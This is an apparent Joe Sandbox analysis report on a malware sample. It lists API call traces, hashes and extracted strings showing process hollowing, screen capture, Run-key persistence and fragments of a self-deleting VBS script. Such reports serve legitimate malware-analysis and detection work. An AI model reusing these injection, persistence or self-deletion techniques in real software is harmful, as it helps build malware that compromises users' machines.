                                                                                                                                                    • Snapshot File: hcaresult_0_3_2be0000_fu56fbrtn8.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 9dfead5a017cd36d3feaf17f600529449a5bb0539cdb5da504dd4c491ec36500
                                                                                                                                                    • Instruction ID: 9ec31cc92d157cab69dec921c8b9c7e374c1754d39d641c651786f23574656bf
                                                                                                                                                    • Opcode Fuzzy Hash: 9dfead5a017cd36d3feaf17f600529449a5bb0539cdb5da504dd4c491ec36500
                                                                                                                                                    • Instruction Fuzzy Hash: D571D239C08B41CFEBA1EB358089517F7E0EF617243919CCDE69346918A768DC6A8F47
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000003.1353909714.0000000002BE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_3_2be0000_fu56fbrtn8.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 38976e1edb0c4285d487dd7a1a6a9e57a2880d90ad22c437041f4ddd3974f101
                                                                                                                                                    • Instruction ID: 9b9a100359de4cc7710a8f2d0ef00995c418640a469b6295e8605ba3646c0c1e
                                                                                                                                                    • Opcode Fuzzy Hash: 38976e1edb0c4285d487dd7a1a6a9e57a2880d90ad22c437041f4ddd3974f101
                                                                                                                                                    • Instruction Fuzzy Hash: 7341923DD0DB80C77B51F8B4414A527F6D0EF693157946DCD88A7A28406B988C2F8FD6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000003.1353909714.0000000002BE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_3_2be0000_fu56fbrtn8.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: efa83b71b02f601142691e2f830ce7d8f28cd9cf9b8ded4ba91d0f0c820722cc
                                                                                                                                                    • Instruction ID: c4891474fd6c8c557d4b7e773bbdc2011645d501897560378e381c18d91c29e1
                                                                                                                                                    • Opcode Fuzzy Hash: efa83b71b02f601142691e2f830ce7d8f28cd9cf9b8ded4ba91d0f0c820722cc
                                                                                                                                                    • Instruction Fuzzy Hash: 8431A43DD1DB80CB7B51F9B4404A126B7D0EF2D3107946DCEC8A7A28456B888C2B8ED7
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000003.1353909714.0000000002BE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_3_2be0000_fu56fbrtn8.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: a0229eb4fb01197e5da1b57971c7c97f8264d979de064060e7e876e90b447d6a
                                                                                                                                                    • Instruction ID: 85554748974a54c2a645708b40f020bf227a21afd24b12e520d62cc57ff63540
                                                                                                                                                    • Opcode Fuzzy Hash: a0229eb4fb01197e5da1b57971c7c97f8264d979de064060e7e876e90b447d6a
                                                                                                                                                    • Instruction Fuzzy Hash: 3531B43AE35B80C77B50E8BC404B162F681DF55654BB429C9C86F828417F358CAA8FC7
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000003.1353909714.0000000002BE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_3_2be0000_fu56fbrtn8.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 1bbf9b4f2d4226785c5a90c4fa0ba9b85b3d41db6c61e393382e104b37dc5d48
                                                                                                                                                    • Instruction ID: ef75c7131442d96b3dc463571f690d8221d990f5240e0a9e62d3bef4b0368116
                                                                                                                                                    • Opcode Fuzzy Hash: 1bbf9b4f2d4226785c5a90c4fa0ba9b85b3d41db6c61e393382e104b37dc5d48
                                                                                                                                                    • Instruction Fuzzy Hash: 8A21F63ED0CB90CB7A51F8B8404A126BAA0EF2D3143987DCDC957624046B888C6FCF97
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000003.1353909714.0000000002BE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_3_2be0000_fu56fbrtn8.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 9e0b922751b4bc5b7be17843313b4233d2c9b20d982a4c415fa7e1bcba5933b0
                                                                                                                                                    • Instruction ID: 0bd95de2e4118f360ec24f7df2934577bfeb88892650990083eb94f40b7f2ad1
                                                                                                                                                    • Opcode Fuzzy Hash: 9e0b922751b4bc5b7be17843313b4233d2c9b20d982a4c415fa7e1bcba5933b0
                                                                                                                                                    • Instruction Fuzzy Hash: 87219539D0DB80CB6B51F974404A126B6D0EF2D3107946DCEC8A7A28446B888C2B8A97
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 3dd670f08d3713b1694ae4af04bcf86f7dee781d0857d425e9628cee01928871
                                                                                                                                                    • Instruction ID: 92b9e27e14029e0982b3f471d9ec1f331844703a9d90f6b86c59c694a12313a9
                                                                                                                                                    • Opcode Fuzzy Hash: 3dd670f08d3713b1694ae4af04bcf86f7dee781d0857d425e9628cee01928871
                                                                                                                                                    • Instruction Fuzzy Hash: 4611B729D39640D77E50A9BC410B526B690EF513547749ACAC86FC5C806F348C66CE87
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000003.1353909714.0000000002BE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_3_2be0000_fu56fbrtn8.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 94813ef438d76fa5b1a6a03d0fabb2e97079158e6f7d5092bd163058d3efb34b
                                                                                                                                                    • Instruction ID: 30c94e9573c50092a69edd42800a37ae1abb064405b1cd4492b571d089e6d8f2
                                                                                                                                                    • Opcode Fuzzy Hash: 94813ef438d76fa5b1a6a03d0fabb2e97079158e6f7d5092bd163058d3efb34b
                                                                                                                                                    • Instruction Fuzzy Hash: E411B439D25B40C77B61E9B8404B623B6E0EF613547742DC9C96B825806B388C2B8FC6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000003.1353909714.0000000002BE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_3_2be0000_fu56fbrtn8.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 7dcf526487e59b33916602e7a0125df274e9f6d5af2a162c2c924d788fe91999
                                                                                                                                                    • Instruction ID: 55c7165f6a472c372f6787cbde79910a2724e8ffd394acafa9a84b4aca084ee6
                                                                                                                                                    • Opcode Fuzzy Hash: 7dcf526487e59b33916602e7a0125df274e9f6d5af2a162c2c924d788fe91999
                                                                                                                                                    • Instruction Fuzzy Hash: 8311C139D25B40C76761E9B8404B663F6E0AF613547782CCDD86B829807B348C6B8F87
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000003.1353909714.0000000002BE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_3_2be0000_fu56fbrtn8.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 438b6a24cce1ca9f7437834823e7443a732e98641c20b5b75ab61c5051014f30
                                                                                                                                                    • Instruction ID: 47cfe19b4d991cb0935041a5b16fd0eca885eb15c84595b25737388ec8fdff23
                                                                                                                                                    • Opcode Fuzzy Hash: 438b6a24cce1ca9f7437834823e7443a732e98641c20b5b75ab61c5051014f30
                                                                                                                                                    • Instruction Fuzzy Hash: D911C63ED0A754CBBA60FCB8014B122F590EF31310B842DC9C977A14806B949C7A8ED7
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02DF9E1B,?,?,02DF9EAD,00000000,02DF9F89), ref: 02DF9BA8
• GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02DF9BC0
• GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02DF9BD2
• GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02DF9BE4
• GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02DF9BF6
• GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02DF9C08
• GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02DF9C1A
• GetProcAddress.KERNEL32(00000000,Process32First), ref: 02DF9C2C
• GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02DF9C3E
• GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02DF9C50
• GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02DF9C62
• GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02DF9C74
• GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02DF9C86
• GetProcAddress.KERNEL32(00000000,Module32First), ref: 02DF9C98
• GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02DF9CAA
• GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02DF9CBC
• GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02DF9CCE
Strings
Memory Dump Source
• Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
• Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: AddressProc$HandleModule
• String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
• API String ID: 667068680-597814768
• Opcode ID: cc284926e14b4a95bfc0facec7000c532aa9cdbcc1a55843d0912d7892307877
• Instruction ID: fb12addece893d191e35824ee42b3da6a3a475e04dacac5b88f728b513d1f176
• Opcode Fuzzy Hash: cc284926e14b4a95bfc0facec7000c532aa9cdbcc1a55843d0912d7892307877
• Instruction Fuzzy Hash: 74315DB0D813A09FEF40AF75E881B6933E9EB22211BD108A9A116DF304E374DC44CF65
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 15698E90
• CreateCompatibleDC.GDI32(00000000), ref: 15698E9D
  • Part of subcall function 15699325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 15699355
• CreateCompatibleBitmap.GDI32(00000000,?), ref: 15698F13
• DeleteDC.GDI32(00000000), ref: 15698F2A
• DeleteDC.GDI32(00000000), ref: 15698F2D
• DeleteObject.GDI32(00000000), ref: 15698F30
• SelectObject.GDI32(00000000,00000000), ref: 15698F51
• DeleteDC.GDI32(00000000), ref: 15698F62
• DeleteDC.GDI32(00000000), ref: 15698F65
• StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 15698F89
• GetCursorInfo.USER32(?), ref: 15698FA7
• GetIconInfo.USER32(?,?), ref: 15698FBD
• DeleteObject.GDI32(?), ref: 15698FEC
• DeleteObject.GDI32(?), ref: 15698FF9
• DrawIcon.USER32(00000000,?,?,?), ref: 15699006
• BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 1569903C
• GetObjectA.GDI32(00000000,00000018,?), ref: 15699068
• LocalAlloc.KERNEL32(00000040,00000001), ref: 156990D5
• GlobalAlloc.KERNEL32(00000000,?), ref: 15699144
• GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 15699168
• DeleteDC.GDI32(?), ref: 1569917C
• DeleteDC.GDI32(00000000), ref: 1569917F
• DeleteObject.GDI32(00000000), ref: 15699182
• GlobalFree.KERNEL32(?), ref: 1569918D
• DeleteObject.GDI32(00000000), ref: 15699241
• GlobalFree.KERNEL32(?), ref: 15699248
• DeleteDC.GDI32(?), ref: 15699258
• DeleteDC.GDI32(00000000), ref: 15699263
Strings
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
• String ID: DISPLAY
• API String ID: 4256916514-865373369
• Opcode ID: 16ecccabe4958e393dc6a6e9e6e6648edf8f52a79121c2e8642976a2966c737a
• Instruction ID: 24ad0c19830a6caeea3ae8d5f2f01b2b31164a13ccf78bc4f0544d115965c4e9
• Opcode Fuzzy Hash: 16ecccabe4958e393dc6a6e9e6e6648edf8f52a79121c2e8642976a2966c737a
• Instruction Fuzzy Hash: C4C15875608355AFD724DF24D844F6BBBEAFF89750F00481DF99A93290DB30A904CBA2
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 15698136
• GetProcAddress.KERNEL32(00000000), ref: 15698139
• GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 1569814A
• GetProcAddress.KERNEL32(00000000), ref: 1569814D
• GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 1569815E
• GetProcAddress.KERNEL32(00000000), ref: 15698161
• GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 15698172
• GetProcAddress.KERNEL32(00000000), ref: 15698175
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 15698217
• VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 1569822F
• GetThreadContext.KERNEL32(?,00000000), ref: 15698245
• ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 1569826B
• VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 156982ED
• TerminateProcess.KERNEL32(?,00000000), ref: 15698301
• GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 15698341
• WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 1569840B
• SetThreadContext.KERNEL32(?,00000000), ref: 15698428
• ResumeThread.KERNEL32(?), ref: 15698435
• VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 1569844C
• GetCurrentProcess.KERNEL32(?), ref: 15698457
• TerminateProcess.KERNEL32(?,00000000), ref: 15698472
• GetLastError.KERNEL32 ref: 1569847A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                                                                                                                    • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`Wu$ntdll
                                                                                                                                                    • API String ID: 4188446516-529412701
                                                                                                                                                    • Opcode ID: 7ccbd9d1cd4cfa45d5afdea2cbbb06a98296a32aeb77367f135aca13cee87619
                                                                                                                                                    • Instruction ID: 831e36f8c1cda6a3e0464aa72ffe7c97d2f998fa46101b0868dc0037caff3755
                                                                                                                                                    • Opcode Fuzzy Hash: 7ccbd9d1cd4cfa45d5afdea2cbbb06a98296a32aeb77367f135aca13cee87619
                                                                                                                                                    • Instruction Fuzzy Hash: BAA139B0619315EFEB148F64CC85B6ABBE8FF48708F00492DFA85D6191DB70E844CBA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02DED259
  • Part of subcall function 02DED224: GetProcAddress.KERNEL32(00000000), ref: 02DED23D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
• Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: AddressHandleModuleProc
• String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
• API String ID: 1646373207-1918263038
• Opcode ID: d7597e4de9b1ee200af5bfb0d9da0a5b5b8dfe02ca8446841ad61eb0e02ea7f7
• Instruction ID: 1ca2202c16e135f77f666ba916a07d1ab7dd3fa13e85b726827f7efd00d2cabc
• Opcode Fuzzy Hash: d7597e4de9b1ee200af5bfb0d9da0a5b5b8dfe02ca8446841ad61eb0e02ea7f7
• Instruction Fuzzy Hash: F0413965E842449F5E187B6E740042B77EFDB657107E4841BB80B9B348EE31AC928E3D
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 15692850: TerminateProcess.KERNEL32(00000000,?,1568D80F), ref: 15692860
  • Part of subcall function 15692850: WaitForSingleObject.KERNEL32(000000FF,?,1568D80F), ref: 15692873
• GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 1568D51D
• RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 1568D530
• SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 1568D549
• SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 1568D579
  • Part of subcall function 1568B8AC: TerminateThread.KERNEL32(1568A27D,00000000,00000000,?,1568D442,?,00000000), ref: 1568B8BB
  • Part of subcall function 1568B8AC: UnhookWindowsHookEx.USER32(156F50F0), ref: 1568B8C7
  • Part of subcall function 1568B8AC: TerminateThread.KERNEL32(1568A267,00000000,?,1568D442,?,00000000), ref: 1568B8D5
  • Part of subcall function 1569C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,1569C510,00000000,00000000,00000000), ref: 1569C430
• ShellExecuteW.SHELL32(00000000,open,00000000,156E6468,156E6468,00000000), ref: 1568D7C4
• ExitProcess.KERNEL32 ref: 1568D7D0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
• String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
• API String ID: 1861856835-1536747724
• Opcode ID: 232a92fc08f62edc496be6950214bc168af99b72f0b86a004c679b5376e2c88e
• Instruction ID: 323e3bde7e9c21dd54bc15700f104e0d4a970f319e8b0e825d1c766b4674f4ef
• Opcode Fuzzy Hash: 232a92fc08f62edc496be6950214bc168af99b72f0b86a004c679b5376e2c88e
• Instruction Fuzzy Hash: 7091A47570B3409AC714EB24DCA09EFB7F9AF95214F40052DE486972A0EF34BD49C6EA
Uniqueness
• Uniqueness Score: -1.00%

APIs
• CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,156F50E4,00000003), ref: 15692494
• ExitProcess.KERNEL32(00000000), ref: 156924A0
• CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 1569251A
• OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 15692529
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 15692534
• CloseHandle.KERNEL32(00000000), ref: 1569253B
• GetCurrentProcessId.KERNEL32 ref: 15692541
• PathFileExistsW.SHLWAPI(?), ref: 15692572
• GetTempPathW.KERNEL32(00000104,?), ref: 156925D5
• GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 156925EF
• lstrcatW.KERNEL32(?,.exe), ref: 15692601
  • Part of subcall function 1569C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,1569C510,00000000,00000000,00000000), ref: 1569C430
• ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 15692641
• Sleep.KERNEL32(000001F4), ref: 15692682
• OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 15692697
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 156926A2
• CloseHandle.KERNEL32(00000000), ref: 156926A9
• GetCurrentProcessId.KERNEL32 ref: 156926AF
Strings
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
• String ID: .exe$WDH$exepath$open$temp_
• API String ID: 2649220323-3088914985
• Opcode ID: 9e7db75bcf764dea016dbaa5d9d591f5a06780edc00630d1660d24b9b2a66329
• Instruction ID: e6e34445b4ea9c93007e5a9d7fbe4b85ea1049e764ee0147320eccddff64bc5e
• Opcode Fuzzy Hash: 9e7db75bcf764dea016dbaa5d9d591f5a06780edc00630d1660d24b9b2a66329
• Instruction Fuzzy Hash: F2518475F12219AFDF14DBA0DC98EEE33BEAB44664F000659F942A7180DF346E45C6E4
Uniqueness
• Uniqueness Score: -1.00%

APIs
• mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 1569B13C
• mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 1569B150
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,156E60A4), ref: 1569B178
• PathFileExistsW.SHLWAPI(00000000,00000000,00000000,156F4EE0,00000000), ref: 1569B18E
• mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 1569B1CF
• mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 1569B1E7
• mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 1569B1FC
• SetEvent.KERNEL32 ref: 1569B219
• WaitForSingleObject.KERNEL32(000001F4), ref: 1569B22A
• CloseHandle.KERNEL32 ref: 1569B23A
• mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 1569B25C
• mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 1569B266
Strings
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
• String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
• API String ID: 738084811-1354618412
• Opcode ID: b05db0f30ea50cc85a5c187b50cde752859a441e11e2b8a5ac5d8fe4e5ed4434
• Instruction ID: 7f9240b59680aae1f0e2cf51b9bd380513ee0f60915cf4649973618584964734
• Opcode Fuzzy Hash: b05db0f30ea50cc85a5c187b50cde752859a441e11e2b8a5ac5d8fe4e5ed4434
• Instruction Fuzzy Hash: 0351817571A345AFD318EB30DCA0DAF77AEEB80255F40051EF446965A4EF20BD08C6EA
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 15692850: TerminateProcess.KERNEL32(00000000,?,1568D80F), ref: 15692860
  • Part of subcall function 15692850: WaitForSingleObject.KERNEL32(000000FF,?,1568D80F), ref: 15692873
• GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,156F52F0,?,pth_unenc), ref: 1568D1A5
• RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 1568D1B8
• SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,156F52F0,?,pth_unenc), ref: 1568D1E8
• SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,156F52F0,?,pth_unenc), ref: 1568D1F7
  • Part of subcall function 1568B8AC: TerminateThread.KERNEL32(1568A27D,00000000,00000000,?,1568D442,?,00000000), ref: 1568B8BB
  • Part of subcall function 1568B8AC: UnhookWindowsHookEx.USER32(156F50F0), ref: 1568B8C7
  • Part of subcall function 1568B8AC: TerminateThread.KERNEL32(1568A267,00000000,?,1568D442,?,00000000), ref: 1568B8D5
  • Part of subcall function 1569B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,1568407C), ref: 1569B99F
